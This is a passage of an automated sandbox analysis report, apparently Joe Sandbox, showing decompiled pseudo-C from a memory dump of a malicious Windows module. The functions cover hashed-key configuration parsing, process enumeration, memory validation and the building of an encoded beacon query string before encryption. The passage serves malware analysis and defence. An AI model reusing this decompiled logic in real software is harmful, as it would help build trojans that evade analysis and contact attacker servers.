                                                    						_t48 = 0;
                                                    					} else {
                                                    						_t86 =  *0x109a344; // 0x69b25f44
                                                    						_t48 = E01096FA8(_t104, _t102, _t86 ^ 0x0cd926ce);
                                                    					}
                                                    					if(_t48 != 0) {
                                                    						_t104 =  &_v8;
                                                    						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                                                    							 *0x109a004 = _v8;
                                                    						}
                                                    					}
                                                    					if(_t102 == 0) {
                                                    						_t49 = 0;
                                                    					} else {
                                                    						_t82 =  *0x109a344; // 0x69b25f44
                                                    						_t49 = E01096FA8(_t104, _t102, _t82 ^ 0x3cd8b2cb);
                                                    					}
                                                    					if(_t49 != 0) {
                                                    						_t104 =  &_v8;
                                                    						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                                                    							 *0x109a02c = _v8;
                                                    						}
                                                    					}
                                                    					if(_t102 == 0) {
                                                    						_t50 = 0;
                                                    					} else {
                                                    						_t78 =  *0x109a344; // 0x69b25f44
                                                    						_t50 = E01096FA8(_t104, _t102, _t78 ^ 0x2878b929);
                                                    					}
                                                    					if(_t50 == 0) {
                                                    						L41:
                                                    						 *0x109a2ec = 5; // default when the field is missing or parses to zero
                                                    						goto L42;
                                                    					} else {
                                                    						_t104 =  &_v8;
                                                    						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                                                    							goto L41;
                                                    						} else {
                                                    							L42:
                                                    							if(_t102 == 0) {
                                                    								_t51 = 0;
                                                    							} else {
                                                    								_t75 =  *0x109a344; // 0x69b25f44
                                                    								_t51 = E01096FA8(_t104, _t102, _t75 ^ 0x261a367a);
                                                    							}
                                                    							if(_t51 != 0) {
                                                    								_push(_t51);
                                                    								_t72 = 0x10;
                                                    								_t73 = E01095D66(_t72);
                                                    								if(_t73 != 0) {
                                                    									_push(_t73);
                                                    									E01093A2A();
                                                    								}
                                                    							}
                                                    							if(_t102 == 0) {
                                                    								_t52 = 0;
                                                    							} else {
                                                    								_t70 =  *0x109a344; // 0x69b25f44
                                                    								_t52 = E01096FA8(_t104, _t102, _t70 ^ 0xb9d404b2);
                                                    							}
                                                    							if(_t52 != 0 && E01095D66(0, _t52) != 0) {
                                                    								_t122 =  *0x109a3cc; // 0x1b09600
                                                    								E0109460D(_t122 + 4, _t68);
                                                    							}
                                                    							if(_t102 == 0) {
                                                    								_t53 = 0;
                                                    							} else {
                                                    								_t65 =  *0x109a344; // 0x69b25f44
                                                    								_t53 = E01096FA8(_t104, _t102, _t65 ^ 0x3df17130);
                                                    							}
                                                    							if(_t53 == 0) {
                                                    								L59:
                                                    								_t54 =  *0x109a348; // 0xa6d5a8
                                                    								_t22 = _t54 + 0x109b252; // 0x616d692f: built-in default string; its first bytes decode to "/ima" (little-endian)
                                                    								 *0x109a370 = _t22;
                                                    								goto L60;
                                                    							} else {
                                                    								_t64 = E01095D66(0, _t53);
                                                    								 *0x109a370 = _t64;
                                                    								if(_t64 != 0) {
                                                    									L60:
                                                    									if(_t102 == 0) {
                                                    										_t56 = 0;
                                                    									} else {
                                                    										_t61 =  *0x109a344; // 0x69b25f44
                                                    										_t56 = E01096FA8(_t104, _t102, _t61 ^ 0xd2079859);
                                                    									}
                                                    									if(_t56 == 0) {
                                                    										_t57 =  *0x109a348; // 0xa6d5a8
                                                    										_t23 = _t57 + 0x109b79e; // 0x6976612e: built-in default string; its first bytes decode to ".avi" (little-endian)
                                                    										_t58 = _t23;
                                                    									} else {
                                                    										_t58 = E01095D66(0, _t56);
                                                    									}
                                                    									 *0x109a3e0 = _t58;
                                                    									HeapFree( *0x109a2d8, 0, _t102);
                                                    									_v12 = 0;
                                                    									goto L67;
                                                    								}
                                                    								goto L59;
                                                    							}
                                                    						}
                                                    					}
                                                    				}
                                                    			}
                                                    0x01097596
                                                    0x01097596
                                                    0x01097596
                                                    0x01097596
                                                    0x01097599
                                                    0x010975b6
                                                    0x010975c4
                                                    0x010975c4
                                                    0x010975c9
                                                    0x010975e3
                                                    0x01097851
                                                    0x01097858
                                                    0x0109785c
                                                    0x0109785c
                                                    0x010975e9
                                                    0x010975ee
                                                    0x01097606
                                                    0x0109783e
                                                    0x01097848
                                                    0x00000000
                                                    0x0109760c
                                                    0x0109760c
                                                    0x0109760d
                                                    0x01097612
                                                    0x01097628
                                                    0x01097614
                                                    0x01097614
                                                    0x01097621
                                                    0x01097621
                                                    0x0109762a
                                                    0x01097633
                                                    0x01097635
                                                    0x0109763f
                                                    0x01097644
                                                    0x01097644
                                                    0x0109763f
                                                    0x0109764b
                                                    0x01097661
                                                    0x0109764d
                                                    0x0109764d
                                                    0x0109765a
                                                    0x0109765a
                                                    0x01097665
                                                    0x01097667
                                                    0x01097671
                                                    0x01097676
                                                    0x01097676
                                                    0x01097671
                                                    0x0109767d
                                                    0x01097693
                                                    0x0109767f
                                                    0x0109767f
                                                    0x0109768c
                                                    0x0109768c
                                                    0x01097697
                                                    0x01097699
                                                    0x010976a3
                                                    0x010976a8
                                                    0x010976a8
                                                    0x010976a3
                                                    0x010976af
                                                    0x010976c5
                                                    0x010976b1
                                                    0x010976b1
                                                    0x010976be
                                                    0x010976be
                                                    0x010976c9
                                                    0x010976cb
                                                    0x010976d5
                                                    0x010976da
                                                    0x010976da
                                                    0x010976d5
                                                    0x010976e1
                                                    0x010976f7
                                                    0x010976e3
                                                    0x010976e3
                                                    0x010976f0
                                                    0x010976f0
                                                    0x010976fb
                                                    0x010976fd
                                                    0x01097707
                                                    0x0109770c
                                                    0x0109770c
                                                    0x01097707
                                                    0x01097713
                                                    0x01097729
                                                    0x01097715
                                                    0x01097715
                                                    0x01097722
                                                    0x01097722
                                                    0x0109772d
                                                    0x01097740
                                                    0x01097740
                                                    0x00000000
                                                    0x0109772f
                                                    0x0109772f
                                                    0x01097739
                                                    0x00000000
                                                    0x0109774a
                                                    0x0109774a
                                                    0x0109774c
                                                    0x01097762
                                                    0x0109774e
                                                    0x0109774e
                                                    0x0109775b
                                                    0x0109775b
                                                    0x01097766
                                                    0x01097768
                                                    0x0109776b
                                                    0x0109776c
                                                    0x01097773
                                                    0x01097775
                                                    0x01097776
                                                    0x01097776
                                                    0x01097773
                                                    0x0109777d
                                                    0x01097793
                                                    0x0109777f
                                                    0x0109777f
                                                    0x0109778c
                                                    0x0109778c
                                                    0x01097797
                                                    0x010977a5
                                                    0x010977af
                                                    0x010977af
                                                    0x010977b7
                                                    0x010977cd
                                                    0x010977b9
                                                    0x010977b9
                                                    0x010977c6
                                                    0x010977c6
                                                    0x010977d1
                                                    0x010977e4
                                                    0x010977e4
                                                    0x010977e9
                                                    0x010977ef
                                                    0x00000000
                                                    0x010977d3
                                                    0x010977d6
                                                    0x010977db
                                                    0x010977e2
                                                    0x010977f4
                                                    0x010977f6
                                                    0x0109780c
                                                    0x010977f8
                                                    0x010977f8
                                                    0x01097805
                                                    0x01097805
                                                    0x01097810
                                                    0x0109781c
                                                    0x01097821
                                                    0x01097821
                                                    0x01097812
                                                    0x01097815
                                                    0x01097815
                                                    0x0109782f
                                                    0x01097834
                                                    0x0109783a
                                                    0x00000000
                                                    0x0109783d
                                                    0x00000000
                                                    0x010977e2
                                                    0x010977d1
                                                    0x01097739
                                                    0x0109772d

                                                    APIs
                                                    • StrToIntExA.SHLWAPI(00000000,00000000,?,0109A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 0109763B
                                                    • StrToIntExA.SHLWAPI(00000000,00000000,?,0109A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 0109766D
                                                    • StrToIntExA.SHLWAPI(00000000,00000000,?,0109A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 0109769F
                                                    • StrToIntExA.SHLWAPI(00000000,00000000,?,0109A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 010976D1
                                                    • StrToIntExA.SHLWAPI(00000000,00000000,?,0109A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 01097703
                                                    • StrToIntExA.SHLWAPI(00000000,00000000,?,0109A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 01097735
                                                    • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 01097834
                                                    • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 01097848
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
• Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID: Uqt
                                                    • API String ID: 3298025750-2320327147
                                                    • Opcode ID: 332c717883590384bc2e05ae4bfaa15d49f000f1fcf036e985b9a94948c66687
                                                    • Instruction ID: a2d4868619bcb57e75ceaca665266dec98621262ea906ed30c370363963a568d
                                                    • Opcode Fuzzy Hash: 332c717883590384bc2e05ae4bfaa15d49f000f1fcf036e985b9a94948c66687
                                                    • Instruction Fuzzy Hash: A581F472B20200EBDF61EBBC9DB4D9F7BE9BB4C60072449A5A181D7108F67AD940AF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 68%
                                                    			E010931AB() {
                                                    				char _v264;
                                                    				void* _v300;
                                                    				int _t8;
                                                    				intOrPtr _t9;
                                                    				int _t15;
                                                    				void* _t17;
                                                    
                                                    				_t15 = 0;
                                                    				_t17 = CreateToolhelp32Snapshot(2, 0);
                                                    				if(_t17 != 0) {
                                                    					_t8 = Process32First(_t17,  &_v300);
                                                    					while(_t8 != 0) {
                                                    						_t9 =  *0x109a348; // 0xa6d5a8
                                                    						_t2 = _t9 + 0x109bea8; // 0x73617661
                                                    						_push( &_v264);
                                                    						if( *0x109a12c() != 0) {
                                                    							_t15 = 1;
                                                    						} else {
                                                    							_t8 = Process32Next(_t17,  &_v300);
                                                    							continue;
                                                    						}
                                                    						L7:
                                                    						CloseHandle(_t17);
                                                    						goto L8;
                                                    					}
                                                    					goto L7;
                                                    				}
                                                    				L8:
                                                    				return _t15;
                                                    			}

                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 010931BB
                                                    • Process32First.KERNEL32(00000000,?), ref: 010931CE
                                                    • Process32Next.KERNEL32(00000000,?), ref: 010931FA
                                                    • CloseHandle.KERNEL32(00000000), ref: 01093209
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
• Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 420147892-0
                                                    • Opcode ID: deedbf259be1a03c3147ab1886036652d0de07a1d7ae98c39f113bb670fc09a0
                                                    • Instruction ID: c2863e0ebecad3ffe5d58d0f31bd8c09940569304cd416682829e446c1b9b86e
                                                    • Opcode Fuzzy Hash: deedbf259be1a03c3147ab1886036652d0de07a1d7ae98c39f113bb670fc09a0
                                                    • Instruction Fuzzy Hash: 38F096726011296ADF60AA769C69EEB3AACFBC5350F0001A1FAD5D7000EA649949DBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E01098491(long _a4) {
                                                    				intOrPtr _v8;
                                                    				intOrPtr _v12;
                                                    				signed int _v16;
                                                    				short* _v32;
                                                    				void _v36;
                                                    				void* _t57;
                                                    				signed int _t58;
                                                    				signed int _t61;
                                                    				signed int _t62;
                                                    				void* _t63;
                                                    				signed int* _t68;
                                                    				intOrPtr* _t69;
                                                    				intOrPtr* _t71;
                                                    				intOrPtr _t72;
                                                    				intOrPtr _t75;
                                                    				void* _t76;
                                                    				signed int _t77;
                                                    				void* _t78;
                                                    				void _t80;
                                                    				signed int _t81;
                                                    				signed int _t84;
                                                    				signed int _t86;
                                                    				short* _t87;
                                                    				void* _t89;
                                                    				signed int* _t90;
                                                    				long _t91;
                                                    				signed int _t93;
                                                    				signed int _t94;
                                                    				signed int _t100;
                                                    				signed int _t102;
                                                    				void* _t104;
                                                    				long _t108;
                                                    				signed int _t110;
                                                    
                                                    				_t108 = _a4;
                                                    				_t76 =  *(_t108 + 8);
                                                    				if((_t76 & 0x00000003) != 0) {
                                                    					L3:
                                                    					return 0;
                                                    				}
                                                    				_a4 =  *[fs:0x4];
                                                    				_v8 =  *[fs:0x8];
                                                    				if(_t76 < _v8 || _t76 >= _a4) {
                                                    					_t102 =  *(_t108 + 0xc);
                                                    					__eflags = _t102 - 0xffffffff;
                                                    					if(_t102 != 0xffffffff) {
                                                    						_t91 = 0;
                                                    						__eflags = 0;
                                                    						_a4 = 0;
                                                    						_t57 = _t76;
                                                    						do {
                                                    							_t80 =  *_t57;
                                                    							__eflags = _t80 - 0xffffffff;
                                                    							if(_t80 == 0xffffffff) {
                                                    								goto L9;
                                                    							}
                                                    							__eflags = _t80 - _t91;
                                                    							if(_t80 >= _t91) {
                                                    								L20:
                                                    								_t63 = 0;
                                                    								L60:
                                                    								return _t63;
                                                    							}
                                                    							L9:
                                                    							__eflags =  *(_t57 + 4);
                                                    							if( *(_t57 + 4) != 0) {
                                                    								_t12 =  &_a4;
                                                    								 *_t12 = _a4 + 1;
                                                    								__eflags =  *_t12;
                                                    							}
                                                    							_t91 = _t91 + 1;
                                                    							_t57 = _t57 + 0xc;
                                                    							__eflags = _t91 - _t102;
                                                    						} while (_t91 <= _t102);
                                                    						__eflags = _a4;
                                                    						if(_a4 == 0) {
                                                    							L15:
                                                    							_t81 =  *0x109a380; // 0x0
                                                    							_t110 = _t76 & 0xfffff000;
                                                    							_t58 = 0;
                                                    							__eflags = _t81;
                                                    							if(_t81 <= 0) {
                                                    								L18:
                                                    								_t104 = _t102 | 0xffffffff;
                                                    								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                    								__eflags = _t61;
                                                    								if(_t61 < 0) {
                                                    									_t62 = 0;
                                                    									__eflags = 0;
                                                    								} else {
                                                    									_t62 = _a4;
                                                    								}
                                                    								__eflags = _t62;
                                                    								if(_t62 == 0) {
                                                    									L59:
                                                    									_t63 = _t104;
                                                    									goto L60;
                                                    								} else {
                                                    									__eflags = _v12 - 0x1000000;
                                                    									if(_v12 != 0x1000000) {
                                                    										goto L59;
                                                    									}
                                                    									__eflags = _v16 & 0x000000cc;
                                                    									if((_v16 & 0x000000cc) == 0) {
                                                    										L46:
                                                    										_t63 = 1;
                                                    										 *0x109a3c8 = 1;
                                                    										__eflags =  *0x109a3c8;
                                                    										if( *0x109a3c8 != 0) {
                                                    											goto L60;
                                                    										}
                                                    										_t84 =  *0x109a380; // 0x0
                                                    										__eflags = _t84;
                                                    										_t93 = _t84;
                                                    										if(_t84 <= 0) {
                                                    											L51:
                                                    											__eflags = _t93;
                                                    											if(_t93 != 0) {
                                                    												L58:
                                                    												 *0x109a3c8 = 0;
                                                    												goto L5;
                                                    											}
                                                    											_t77 = 0xf;
                                                    											__eflags = _t84 - _t77;
                                                    											if(_t84 <= _t77) {
                                                    												_t77 = _t84;
                                                    											}
                                                    											_t94 = 0;
                                                    											__eflags = _t77;
                                                    											if(_t77 < 0) {
                                                    												L56:
                                                    												__eflags = _t84 - 0x10;
                                                    												if(_t84 < 0x10) {
                                                    													_t86 = _t84 + 1;
                                                    													__eflags = _t86;
                                                    													 *0x109a380 = _t86;
                                                    												}
                                                    												goto L58;
                                                    											} else {
                                                    												do {
                                                    													_t68 = 0x109a388 + _t94 * 4;
                                                    													_t94 = _t94 + 1;
                                                    													__eflags = _t94 - _t77;
                                                    													 *_t68 = _t110;
                                                    													_t110 =  *_t68;
                                                    												} while (_t94 <= _t77);
                                                    												goto L56;
                                                    											}
                                                    										}
                                                    										_t69 = 0x109a384 + _t84 * 4;
                                                    										while(1) {
                                                    											__eflags =  *_t69 - _t110;
                                                    											if( *_t69 == _t110) {
                                                    												goto L51;
                                                    											}
                                                    											_t93 = _t93 - 1;
                                                    											_t69 = _t69 - 4;
                                                    											__eflags = _t93;
                                                    											if(_t93 > 0) {
                                                    												continue;
                                                    											}
                                                    											goto L51;
                                                    										}
                                                    										goto L51;
                                                    									}
                                                    									_t87 = _v32;
                                                    									__eflags =  *_t87 - 0x5a4d;
                                                    									if( *_t87 != 0x5a4d) {
                                                    										goto L59;
                                                    									}
                                                    									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                    									__eflags =  *_t71 - 0x4550;
                                                    									if( *_t71 != 0x4550) {
                                                    										goto L59;
                                                    									}
                                                    									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                    									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                    										goto L59;
                                                    									}
                                                    									_t78 = _t76 - _t87;
                                                    									__eflags =  *((short*)(_t71 + 6));
                                                    									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                    									if( *((short*)(_t71 + 6)) <= 0) {
                                                    										goto L59;
                                                    									}
                                                    									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                    									__eflags = _t78 - _t72;
                                                    									if(_t78 < _t72) {
                                                    										goto L46;
                                                    									}
                                                    									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                    									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                    										goto L46;
                                                    									}
                                                    									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                    									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                    										goto L20;
                                                    									}
                                                    									goto L46;
                                                    								}
                                                    							} else {
                                                    								goto L16;
                                                    							}
                                                    							while(1) {
                                                    								L16:
                                                    								__eflags =  *((intOrPtr*)(0x109a388 + _t58 * 4)) - _t110;
                                                    								if( *((intOrPtr*)(0x109a388 + _t58 * 4)) == _t110) {
                                                    									break;
                                                    								}
                                                    								_t58 = _t58 + 1;
                                                    								__eflags = _t58 - _t81;
                                                    								if(_t58 < _t81) {
                                                    									continue;
                                                    								}
                                                    								goto L18;
                                                    							}
                                                    							__eflags = _t58;
                                                    							if(_t58 <= 0) {
                                                    								goto L5;
                                                    							}
                                                    							 *0x109a3c8 = 1;
                                                    							__eflags =  *0x109a3c8;
                                                    							if( *0x109a3c8 != 0) {
                                                    								goto L5;
                                                    							}
                                                    							__eflags =  *((intOrPtr*)(0x109a388 + _t58 * 4)) - _t110;
                                                    							if( *((intOrPtr*)(0x109a388 + _t58 * 4)) == _t110) {
                                                    								L32:
                                                    								_t100 = 0;
                                                    								__eflags = _t58;
                                                    								if(_t58 < 0) {
                                                    									L34:
                                                    									 *0x109a3c8 = 0;
                                                    									goto L5;
                                                    								} else {
                                                    									goto L33;
                                                    								}
                                                    								do {
                                                    									L33:
                                                    									_t90 = 0x109a388 + _t100 * 4;
                                                    									_t100 = _t100 + 1;
                                                    									__eflags = _t100 - _t58;
                                                    									 *_t90 = _t110;
                                                    									_t110 =  *_t90;
                                                    								} while (_t100 <= _t58);
                                                    								goto L34;
                                                    							}
                                                    							_t25 = _t81 - 1; // -1
                                                    							_t58 = _t25;
                                                    							__eflags = _t58;
                                                    							if(_t58 < 0) {
                                                    								L28:
                                                    								__eflags = _t81 - 0x10;
                                                    								if(_t81 < 0x10) {
                                                    									_t81 = _t81 + 1;
                                                    									__eflags = _t81;
                                                    									 *0x109a380 = _t81;
                                                    								}
                                                    								_t28 = _t81 - 1; // 0x0
                                                    								_t58 = _t28;
                                                    								goto L32;
                                                    							} else {
                                                    								goto L25;
                                                    							}
                                                    							while(1) {
                                                    								L25:
                                                    								__eflags =  *((intOrPtr*)(0x109a388 + _t58 * 4)) - _t110;
                                                    								if( *((intOrPtr*)(0x109a388 + _t58 * 4)) == _t110) {
                                                    									break;
                                                    								}
                                                    								_t58 = _t58 - 1;
                                                    								__eflags = _t58;
                                                    								if(_t58 >= 0) {
                                                    									continue;
                                                    								}
                                                    								break;
                                                    							}
                                                    							__eflags = _t58;
                                                    							if(__eflags >= 0) {
                                                    								if(__eflags == 0) {
                                                    									goto L34;
                                                    								}
                                                    								goto L32;
                                                    							}
                                                    							goto L28;
                                                    						}
                                                    						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                    						__eflags = _t75 - _v8;
                                                    						if(_t75 < _v8) {
                                                    							goto L20;
                                                    						}
                                                    						__eflags = _t75 - _t108;
                                                    						if(_t75 >= _t108) {
                                                    							goto L20;
                                                    						}
                                                    						goto L15;
                                                    					}
                                                    					L5:
                                                    					_t63 = 1;
                                                    					goto L60;
                                                    				} else {
                                                    					goto L3;
                                                    				}
                                                    			}

                                                    APIs
                                                    • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 01098542
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: MemoryQueryVirtual
                                                    • String ID:
                                                    • API String ID: 2850889275-0
                                                    • Opcode ID: 5dc9f3bc2539d94c4cad347917fb90cd2e50f1e2094aeafef9aa379c6a5dbc43
                                                    • Instruction ID: fb71311eeb8505f3d1f32be3116552b59a25bf471780c528382d12d23e36a1ca
                                                    • Opcode Fuzzy Hash: 5dc9f3bc2539d94c4cad347917fb90cd2e50f1e2094aeafef9aa379c6a5dbc43
                                                    • Instruction Fuzzy Hash: 2761C63070060ADBDF6ACE2CC8B066937E5BB47354B24C5ABE5C5CB389E775D845A780
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 76%
                                                    			E01091910(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
                                                    				intOrPtr _v4;
                                                    				signed int _v8;
                                                    				int* _v12;
                                                    				char* _v16;
                                                    				intOrPtr _v20;
                                                    				void* _v24;
                                                    				intOrPtr _v32;
                                                    				intOrPtr _v36;
                                                    				void* _v40;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				long _t68;
                                                    				intOrPtr _t69;
                                                    				intOrPtr _t70;
                                                    				intOrPtr _t71;
                                                    				intOrPtr _t72;
                                                    				intOrPtr _t73;
                                                    				void* _t76;
                                                    				intOrPtr _t77;
                                                    				int _t80;
                                                    				intOrPtr _t81;
                                                    				intOrPtr _t85;
                                                    				intOrPtr _t86;
                                                    				intOrPtr _t87;
                                                    				void* _t89;
                                                    				void* _t92;
                                                    				intOrPtr _t96;
                                                    				intOrPtr _t100;
                                                    				intOrPtr* _t102;
                                                    				int* _t108;
                                                    				int* _t118;
                                                    				char** _t120;
                                                    				char* _t121;
                                                    				intOrPtr* _t126;
                                                    				intOrPtr* _t128;
                                                    				intOrPtr* _t130;
                                                    				intOrPtr* _t132;
                                                    				intOrPtr _t135;
                                                    				intOrPtr _t139;
                                                    				int _t142;
                                                    				intOrPtr _t144;
                                                    				int _t147;
                                                    				intOrPtr _t148;
                                                    				int _t151;
                                                    				void* _t152;
                                                    				intOrPtr _t166;
                                                    				void* _t168;
                                                    				int _t169;
                                                    				void* _t170;
                                                    				void* _t171;
                                                    				long _t172;
                                                    				intOrPtr* _t173;
                                                    				intOrPtr* _t174;
                                                    				intOrPtr _t175;
                                                    				intOrPtr* _t178;
                                                    				char** _t181;
                                                    				char** _t183;
                                                    				char** _t184;
                                                    				void* _t189;
                                                    
                                                    				_t68 = __eax;
                                                    				_t181 =  &_v16;
                                                    				_t152 = _a20;
                                                    				_a20 = 8;
                                                    				if(__eax == 0) {
                                                    					_t68 = GetTickCount();
                                                    				}
                                                    				_t69 =  *0x109a018; // 0x99c08bf
                                                    				asm("bswap eax");
                                                    				_t70 =  *0x109a014; // 0x3a87c8cd
                                                    				asm("bswap eax");
                                                    				_t71 =  *0x109a010; // 0xd8d2f808
                                                    				asm("bswap eax");
                                                    				_t72 =  *0x109a00c; // 0x81762942
                                                    				asm("bswap eax");
                                                    				_t73 =  *0x109a348; // 0xa6d5a8
                                                    				_t3 = _t73 + 0x109b62b; // 0x74666f73
                                                    				_t169 = wsprintfA(_t152, _t3, 3, 0x3d189, _t72, _t71, _t70, _t69,  *0x109a02c,  *0x109a004, _t68);
                                                    				_t76 = E01092C6E();
                                                    				_t77 =  *0x109a348; // 0xa6d5a8
                                                    				_t4 = _t77 + 0x109b66b; // 0x74707526
                                                    				_t80 = wsprintfA(_t169 + _t152, _t4, _t76);
                                                    				_t183 =  &(_t181[0xe]);
                                                    				_t170 = _t169 + _t80;
                                                    				if(_a24 != 0) {
                                                    					_t148 =  *0x109a348; // 0xa6d5a8
                                                    					_t8 = _t148 + 0x109b676; // 0x732526
                                                    					_t151 = wsprintfA(_t170 + _t152, _t8, _a24);
                                                    					_t183 =  &(_t183[3]);
                                                    					_t170 = _t170 + _t151;
                                                    				}
                                                    				_t81 =  *0x109a348; // 0xa6d5a8
                                                    				_t10 = _t81 + 0x109b78e; // 0x1b08d36
                                                    				_t153 = _t10;
                                                    				_t189 = _a20 - _t10;
                                                    				_t12 = _t81 + 0x109b2de; // 0x74636126
                                                    				_t164 = 0 | _t189 == 0x00000000;
                                                    				_t171 = _t170 + wsprintfA(_t170 + _t152, _t12, _t189 == 0);
                                                    				_t85 =  *0x109a36c; // 0x1b095b0
                                                    				_t184 =  &(_t183[3]);
                                                    				if(_t85 != 0) {
                                                    					_t144 =  *0x109a348; // 0xa6d5a8
                                                    					_t16 = _t144 + 0x109b889; // 0x3d736f26
                                                    					_t147 = wsprintfA(_t171 + _t152, _t16, _t85);
                                                    					_t184 =  &(_t184[3]);
                                                    					_t171 = _t171 + _t147;
                                                    				}
                                                    				_t86 = E0109131C(_t153);
                                                    				_a32 = _t86;
                                                    				if(_t86 != 0) {
                                                    					_t139 =  *0x109a348; // 0xa6d5a8
                                                    					_t19 = _t139 + 0x109b8c2; // 0x736e6426
                                                    					_t142 = wsprintfA(_t171 + _t152, _t19, _t86);
                                                    					_t184 =  &(_t184[3]);
                                                    					_t171 = _t171 + _t142;
                                                    					HeapFree( *0x109a2d8, 0, _a40);
                                                    				}
                                                    				_t87 = E010916DD();
                                                    				_a32 = _t87;
                                                    				if(_t87 != 0) {
                                                    					_t135 =  *0x109a348; // 0xa6d5a8
                                                    					_t23 = _t135 + 0x109b8ca; // 0x6f687726
                                                    					wsprintfA(_t171 + _t152, _t23, _t87);
                                                    					_t184 =  &(_t184[3]);
                                                    					HeapFree( *0x109a2d8, 0, _a40);
                                                    				}
                                                    				_t166 =  *0x109a3cc; // 0x1b09600
                                                    				_t89 = E01093A89(0x109a00a, _t166 + 4);
                                                    				_t172 = 0;
                                                    				_a16 = _t89;
                                                    				if(_t89 == 0) {
                                                    					L30:
                                                    					HeapFree( *0x109a2d8, _t172, _t152);
                                                    					return _a44;
                                                    				} else {
                                                    					_t92 = RtlAllocateHeap( *0x109a2d8, 0, 0x800);
                                                    					_a24 = _t92;
                                                    					if(_t92 == 0) {
                                                    						L29:
                                                    						HeapFree( *0x109a2d8, _t172, _a8);
                                                    						goto L30;
                                                    					}
                                                    					E0109785D(GetTickCount());
                                                    					_t96 =  *0x109a3cc; // 0x1b09600
                                                    					__imp__(_t96 + 0x40);
                                                    					asm("lock xadd [eax], ecx");
                                                    					_t100 =  *0x109a3cc; // 0x1b09600
                                                    					__imp__(_t100 + 0x40);
                                                    					_t102 =  *0x109a3cc; // 0x1b09600
                                                    					_t168 = E0109581D(1, _t164, _t152,  *_t102);
                                                    					asm("lock xadd [eax], ecx");
                                                    					if(_t168 == 0) {
                                                    						L28:
                                                    						HeapFree( *0x109a2d8, _t172, _a16);
                                                    						goto L29;
                                                    					}
                                                    					StrTrimA(_t168, 0x1099280);
                                                    					_push(_t168);
                                                    					_t108 = E010911A3();
                                                    					_v12 = _t108;
                                                    					if(_t108 == 0) {
                                                    						L27:
                                                    						HeapFree( *0x109a2d8, _t172, _t168);
                                                    						goto L28;
                                                    					}
                                                    					_t173 = __imp__;
                                                    					 *_t173(_t168, _a8);
                                                    					 *_t173(_a4, _v12);
                                                    					_t174 = __imp__;
